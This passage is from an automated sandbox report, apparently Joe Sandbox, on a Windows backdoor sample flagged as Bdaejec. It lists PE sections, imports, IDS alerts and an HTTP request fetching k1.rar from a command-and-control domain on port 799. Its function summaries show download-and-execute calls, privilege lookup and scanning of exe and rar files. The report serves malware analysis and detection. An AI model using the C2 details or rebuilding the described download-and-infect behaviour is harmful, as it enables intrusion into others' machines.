.vmp0	0x37c000	0x1290	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
+!i~u	0x37e000	0x5000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.vmp1	0x383000	0x274068	0x0	d41d8cd98f00b204e9800998ecf8427e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.vmp2	0x5f8000	0x380940	0x380a00	d25d3a1c51d94ed87257b21815b90077	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.reloc	0x979000	0x114	0x200	0b17e0470b8dded571f1d14da359d4db	False	0.4140625	data	2.6397875364567573	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x97a000	0x10fe	0x1200	01a22eb9db3bcf4f46a1615b46310d7e	False	0.7543402777777778	data	6.5866211706442135	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x97a0e8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Chinese	Taiwan	0.8446162046908315
RT_GROUP_ICON	0x97af90	0x14	data	Chinese	Taiwan	1.15
RT_MANIFEST	0x97afa4	0x15a	ASCII text, with CRLF line terminators	English	United States	0.5491329479768786

Imports

DLL	Import
IMM32.dll	ImmIsIME
WS2_32.dll	gethostbyaddr
KERNEL32.dll	GetVersionExA
USER32.dll	CloseClipboard
GDI32.dll	CreateFontIndirectA
ole32.dll	CoInitialize
WINMM.dll	waveOutGetVolume
DDRAW.dll	DirectDrawCreate
DSOUND.dll
COMDLG32.dll	ChooseColorA
SHELL32.dll	SHGetPathFromIDListA
WTSAPI32.dll	WTSSendMessageW
KERNEL32.dll	GetCurrentProcess
USER32.dll	CharUpperBuffW
ADVAPI32.dll	RegQueryValueExA
KERNEL32.dll	LocalAlloc, GetCurrentProcess, GetCurrentThread, LocalFree, GetModuleFileNameW, GetProcessAffinityMask, SetProcessAffinityMask, SetThreadAffinityMask, Sleep, ExitProcess, GetLastError, FreeLibrary, LoadLibraryA, GetModuleHandleA, GetProcAddress
ADVAPI32.dll	OpenSCManagerW, EnumServicesStatusExW, OpenServiceW, QueryServiceConfigW, CloseServiceHandle

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	Taiwan
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-11T10:31:59.975702+0200	2838522	ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup	1	192.168.2.6	64889	1.1.1.1	53	UDP
2024-09-11T10:32:00.466633+0200	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	1	192.168.2.6	49710	44.221.84.105	799	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 11, 2024 10:32:00.078910112 CEST	49710	799	192.168.2.6	44.221.84.105
Sep 11, 2024 10:32:00.083893061 CEST	799	49710	44.221.84.105	192.168.2.6
Sep 11, 2024 10:32:00.083987951 CEST	49710	799	192.168.2.6	44.221.84.105
Sep 11, 2024 10:32:00.084156036 CEST	49710	799	192.168.2.6	44.221.84.105
Sep 11, 2024 10:32:00.088951111 CEST	799	49710	44.221.84.105	192.168.2.6
Sep 11, 2024 10:32:00.466561079 CEST	799	49710	44.221.84.105	192.168.2.6
Sep 11, 2024 10:32:00.466592073 CEST	799	49710	44.221.84.105	192.168.2.6
Sep 11, 2024 10:32:00.466633081 CEST	49710	799	192.168.2.6	44.221.84.105
Sep 11, 2024 10:32:00.466662884 CEST	49710	799	192.168.2.6	44.221.84.105
Sep 11, 2024 10:32:00.468745947 CEST	49710	799	192.168.2.6	44.221.84.105
Sep 11, 2024 10:32:00.474230051 CEST	799	49710	44.221.84.105	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 11, 2024 10:31:59.975702047 CEST	64889	53	192.168.2.6	1.1.1.1
Sep 11, 2024 10:32:00.072731972 CEST	53	64889	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 11, 2024 10:31:59.975702047 CEST	192.168.2.6	1.1.1.1	0x4b85	Standard query (0)	ddos.dnsnb8.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 11, 2024 10:32:00.072731972 CEST	1.1.1.1	192.168.2.6	0x4b85	No error (0)	ddos.dnsnb8.net		44.221.84.105	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ddos.dnsnb8.net:799

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49710	44.221.84.105	799	5008	C:\Users\user\AppData\Local\Temp\mXfByV.exe

Timestamp	Bytes transferred	Direction	Data
Sep 11, 2024 10:32:00.084156036 CEST	288	OUT	GET /cj//k1.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Target ID:	0
Start time:	04:31:57
Start date:	11/09/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe"
Imagebase:	0x400000
File size:	3'678'720 bytes
MD5 hash:	6824B9059B9C6F285F3C6CAF2EE19ECC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:31:58
Start date:	11/09/2024
Path:	C:\Users\user\AppData\Local\Temp\mXfByV.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\mXfByV.exe
Imagebase:	0x640000
File size:	15'872 bytes
MD5 hash:	56B2C3810DBA2E939A8BB9FA36D3CF96
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 100%, ReversingLabs Detection: 96%, Virustotal, Browse
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	04:32:03
Start date:	11/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5008 -s 1532
Imagebase:	0x30000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	31.9%
Dynamic/Decrypted Code Coverage:	10.4%
Signature Coverage:	23.6%
Total number of Nodes:	297
Total number of Limit Nodes:	12

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 006429E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00642A02
wsprintfA.USER32 ref: 00642A1A
memset.MSVCRT ref: 00642A44
lstrlen.KERNEL32(?), ref: 00642A54
lstrcpyn.KERNEL32(?,?,-00000001), ref: 00642A6C
strrchr.MSVCRT ref: 00642A7C
lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00642A9F
lstrlen.KERNEL32(Documents and Settings), ref: 00642AAE
memset.MSVCRT ref: 00642AC6
memset.MSVCRT ref: 00642ADA
FindFirstFileA.KERNEL32(?,?), ref: 00642AEF
memset.MSVCRT ref: 00642B13
lstrcmpiA.KERNEL32(?,?), ref: 00642B42
FindNextFileA.KERNEL32(00000000,?,?,?,?), ref: 00642B67
FindClose.KERNEL32(00000000), ref: 00642B6E

Strings

Documents and Settings, xrefs: 00642A8D, 00642A92, 00642A9A, 00642AAD
%s*, xrefs: 00642A14
C:\, xrefs: 00642A2F

Memory Dump Source

Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true

Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd

Similarity

API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
String ID: %s*$C:\$Documents and Settings
API String ID: 2826467728-110786608
Opcode ID: 482ffc6e283e8496c7ab8115aea8d64019ea393e8b21d6600b66df4d7d9509f5
Instruction ID: 046e80ae3316cf4a6c617d805bdb80bef430b45e225c688b944c1159a9bb25da
Opcode Fuzzy Hash: 482ffc6e283e8496c7ab8115aea8d64019ea393e8b21d6600b66df4d7d9509f5
Instruction Fuzzy Hash: FF41CAB240434AAFD720DFA0EC89DDB7BEEEF85715F540929F944C3211E634D64887A6

Function 00641099 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 74
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0064185B: GetSystemTimeAsFileTime.KERNEL32(00641F92,00000000,?,00000000,?,?,?,00641F92,?,00000000,00000002), ref: 00641867
Part of subcall function 0064185B: srand.MSVCRT ref: 00641878
Part of subcall function 0064185B: rand.MSVCRT ref: 00641880
Part of subcall function 0064185B: srand.MSVCRT ref: 00641890
Part of subcall function 0064185B: rand.MSVCRT ref: 00641894

WinExec.KERNEL32(?,00000005), ref: 006410F1
lstrlen.KERNEL32(00644748), ref: 006410FA
wsprintfA.USER32 ref: 0064112A
wsprintfA.USER32 ref: 00641143
URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0064115B
lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00641169
Sleep.KERNEL32 ref: 00641179

Strings

cj/, xrefs: 00641135
HGd, xrefs: 0064112C
ddos.dnsnb8.net, xrefs: 006410C8, 006410CF, 00641140, 00641168
%s%.8X.exe, xrefs: 00641124
C:\Users\user\AppData\Local\Temp\, xrefs: 00641119
http://%s:%d/%s/%s, xrefs: 006410C2, 00641141

Memory Dump Source

Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true

Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd

Similarity

API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$HGd$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1280626985-3007441393
Opcode ID: db53312962fcb2e492e5902d13b6328a411305bbc03ab13f6c4a250653052106
Instruction ID: 88f58faf0b94b2451793cabb9c6a46e673ed7557c4739306be809d169ee69647
Opcode Fuzzy Hash: db53312962fcb2e492e5902d13b6328a411305bbc03ab13f6c4a250653052106
Instruction Fuzzy Hash: 1921AC79800218BEDB20DBA0DC4ABEEBBBFAB17745F110199E100A7250DB749B84CF60

Function 00641718 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 65
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\mXfByV.exe), ref: 00641729
SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 0064174C
SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 0064177C
__aulldiv.LIBCMT ref: 00641796
__aulldiv.LIBCMT ref: 006417A8

Strings

C:\Users\user\AppData\Local\Temp\mXfByV.exe, xrefs: 00641722
SOFTWARE\GTplus, xrefs: 00641742, 0064176B
Time, xrefs: 0064173D, 00641766

Memory Dump Source

Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true

Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd

Similarity

API ID: TimeValue__aulldiv$FileSystem
String ID: C:\Users\user\AppData\Local\Temp\mXfByV.exe$SOFTWARE\GTplus$Time
API String ID: 541852442-4265843220
Opcode ID: 5b34f81f490935e585d155d3744a6947243218e7e0e5b5bee35943abe5d08194
Instruction ID: 4be2510dfdb582bf20ab0f9dc5cfdabd2d4cff908f7ae8f389f0dcc7e1d8e555
Opcode Fuzzy Hash: 5b34f81f490935e585d155d3744a6947243218e7e0e5b5bee35943abe5d08194
Instruction Fuzzy Hash: 55115B75A00219BBDB109B94CCC9FEF7BBFEB46B14F108115FA01B6281D671DA44C760

Function 00646076 Relevance: 11.1, APIs: 7, Instructions: 616
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 006460BE
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 006460DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00646189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 006461A5

Memory Dump Source

Source File: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true

Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: a03e763b9a708c890813b2202750f187b8ac4687c2b0437afe9192a2f79369ce
Instruction ID: 780ad9bed4f0b332ad9bce20be41139d348ae7ca8aa8362dbe5240d283b2ac79
Opcode Fuzzy Hash: a03e763b9a708c890813b2202750f187b8ac4687c2b0437afe9192a2f79369ce
Instruction Fuzzy Hash: 621245B25087849FDB368F64CC55BEA3BB2EF03310F1845AEF8858B693D674A901C756

Function 00642B8C Relevance: 10.6, APIs: 7, Instructions: 74
threadstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00642BA6
GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00642BB4
GetDriveTypeA.KERNEL32(?), ref: 00642BD3
CreateThread.KERNEL32(00000000,00000000,00642B7D,?,00000000,00000000), ref: 00642BEE
lstrlen.KERNEL32(?), ref: 00642BFB
WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00642C16
CreateThread.KERNEL32(00000000,00000000,00642845,00000000,00000000,00000000), ref: 00642C3A

Memory Dump Source

Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true

Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd

Similarity

API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
String ID:
API String ID: 1073171358-0
Opcode ID: c7ae9e6dea723646f570cba3df6c27146dc2547ce2b5935a4732beaa7c0ab111
Instruction ID: e1cbd16166f5430e35e8aad0b5e5acd719f4ecdfa68166c9571618e00824cb83
Opcode Fuzzy Hash: c7ae9e6dea723646f570cba3df6c27146dc2547ce2b5935a4732beaa7c0ab111
Instruction Fuzzy Hash: 1521D5B580015EAFE720AF64AC84EEF7B6FFB06748B650229F942D3251D7308D06CB60

Function 00641E6E Relevance: 44.1, APIs: 20, Strings: 5, Instructions: 380
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesA.KERNEL32(?,00000080,?,006432B0,00000164,00642986,?), ref: 00641EB9
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00641ECD
SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00641EF3
CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00641F07
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00641F1D
FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 0064201E
memset.MSVCRT ref: 006420D8
memset.MSVCRT ref: 006420EA
memcpy.MSVCRT(?,?,00000028,?,?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0064222D
UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00642238
CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0064224A
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006422C6
SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006422CB
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006422DD
WriteFile.KERNEL32(000000FF,00644008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006422F7
WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0064230D
CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00642322
UnmapViewOfFile.KERNEL32(?,?,006432B0,00000164,00642986,?), ref: 00642340
CloseHandle.KERNEL32(?,?,006432B0,00000164,00642986,?), ref: 0064234E
CloseHandle.KERNEL32(000000FF,?,006432B0,00000164,00642986,?), ref: 00642359

Strings

C@d, xrefs: 0064229E
<@d, xrefs: 00642290
.@d, xrefs: 00642274
5@d, xrefs: 00642282
m@d, xrefs: 00641E8F, 0064225A

Memory Dump Source

Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true

Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd

Similarity

API ID: File$CloseHandleView$Pointer$CreateUnmapWritememset$AttributesFlushMappingmemcpy
String ID: .@d$5@d$<@d$C@d$m@d
API String ID: 3043204753-2045934198
Opcode ID: c2740679d517a3e86325a1451f12c9ac2ef43c140a6e02f5b286a3c3ce667949
Instruction ID: 9fcb3d5e96e7916a6e8c9de6e94fb72d4173ba26f1f7ea51926d3596f3d0be3c
Opcode Fuzzy Hash: c2740679d517a3e86325a1451f12c9ac2ef43c140a6e02f5b286a3c3ce667949
Instruction Fuzzy Hash: 97F17A74900209EFCB20DFA4DC91AADBBB6FF09304F60452AF519AB661D734AE81CF54

Function 00641973 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 144
filesleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathFileExistsA.SHLWAPI(\Nd`Nd,00000000,C:\Users\user\AppData\Local\Temp\mXfByV.exe), ref: 00641992
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 006419BA
Sleep.KERNEL32(00000064), ref: 006419C6
wsprintfA.USER32 ref: 006419EC
CopyFileA.KERNEL32(?,?,00000000), ref: 00641A00
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00641A1E
GetFileSize.KERNEL32(?,00000000), ref: 00641A2C
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00641A46
ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00641A65
CloseHandle.KERNEL32(000000FF), ref: 00641A90
DeleteFileA.KERNEL32(?), ref: 00641AA7
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00641AC1

Strings

C:\Users\user\AppData\Local\Temp\mXfByV.exe, xrefs: 0064197C
%s%.8X.data, xrefs: 006419E6
C:\Users\user\AppData\Local\Temp\, xrefs: 006419DB
\Nd`Nd, xrefs: 00641980

Memory Dump Source

Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true

Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd

Similarity

API ID: File$CreateVirtual$AllocCloseCopyDeleteExistsFreeHandlePathReadSizeSleepwsprintf
String ID: %s%.8X.data$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\mXfByV.exe$\Nd`Nd
API String ID: 716042067-3642655191
Opcode ID: 92e1f96466dffbe9bfa620597f33f61e31f9120286259171705a591a6a80b602
Instruction ID: d1ea2e89c8d365237c51aca71c59278356398f74165c92990a6cae2c3eaebbbf
Opcode Fuzzy Hash: 92e1f96466dffbe9bfa620597f33f61e31f9120286259171705a591a6a80b602
Instruction Fuzzy Hash: 17514E71901259EFCF209F98CC84AEEBBBAFB06754F104669F515EA290D3709EC0CB60

Function 006428B8 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 100
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 006428D3
wsprintfA.USER32 ref: 006428F7
memset.MSVCRT ref: 00642925
wsprintfA.USER32 ref: 00642940

Part of subcall function 006429E2: memset.MSVCRT ref: 00642A02
Part of subcall function 006429E2: wsprintfA.USER32 ref: 00642A1A
Part of subcall function 006429E2: memset.MSVCRT ref: 00642A44
Part of subcall function 006429E2: lstrlen.KERNEL32(?), ref: 00642A54
Part of subcall function 006429E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00642A6C
Part of subcall function 006429E2: strrchr.MSVCRT ref: 00642A7C
Part of subcall function 006429E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00642A9F
Part of subcall function 006429E2: lstrlen.KERNEL32(Documents and Settings), ref: 00642AAE
Part of subcall function 006429E2: memset.MSVCRT ref: 00642AC6
Part of subcall function 006429E2: memset.MSVCRT ref: 00642ADA
Part of subcall function 006429E2: FindFirstFileA.KERNEL32(?,?), ref: 00642AEF
Part of subcall function 006429E2: memset.MSVCRT ref: 00642B13

strrchr.MSVCRT ref: 00642959
lstrcmpiA.KERNEL32(00000001,exe), ref: 00642974

Strings

%s%s, xrefs: 006428F1
%s\, xrefs: 0064293A
exe, xrefs: 0064296D
C:\Users\user\AppData\Local\Temp\, xrefs: 006429B3
rar, xrefs: 00642988

Memory Dump Source

Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true

Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd

Similarity

API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
API String ID: 3004273771-1791786966
Opcode ID: eff273e38949edb9861d0a8cc199f59f2eae95927d09aad23c3a05d16c2f92fb
Instruction ID: a47b8da85f323850ebce14a58aaee0d353b0900faa3928abfac49d75155b1192
Opcode Fuzzy Hash: eff273e38949edb9861d0a8cc199f59f2eae95927d09aad23c3a05d16c2f92fb
Instruction Fuzzy Hash: FF31297694031E7BDB20AB66DCA5FCA376EAF11710F640456F545E3280EBF4DAC48BA0

Function 00641638 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 70
stringsynchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 0064164F
GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 0064165B
GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\mXfByV.exe,00000104), ref: 0064166E
CreateThread.KERNEL32(00000000,00000000,00641099,00000000,00000000,00000000), ref: 006416AC
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 006416BD

Part of subcall function 0064139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\mXfByV.exe), ref: 006413BC
Part of subcall function 0064139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 006413DA
Part of subcall function 0064139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00641448

lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\mXfByV.exe), ref: 006416E5

Strings

C:\Users\user\AppData\Local\Temp\mXfByV.exe, xrefs: 00641662, 00641667, 006416DD
Documents and Settings, xrefs: 00641696
C:\Windows\system32, xrefs: 00641656
C:\Users\user\AppData\Local\Temp\, xrefs: 00641644

Memory Dump Source

Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true

Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd

Similarity

API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\mXfByV.exe$C:\Windows\system32$Documents and Settings
API String ID: 123563730-3829935983
Opcode ID: b29855f7ca867ed7e0951f1126782e2b984c460435efc7e3d8e9a209c5fa6ddc
Instruction ID: 4f1864c73029a882d5d213d030c8fd18e5a409f6f44c341ad4de8955909aa025
Opcode Fuzzy Hash: b29855f7ca867ed7e0951f1126782e2b984c460435efc7e3d8e9a209c5fa6ddc
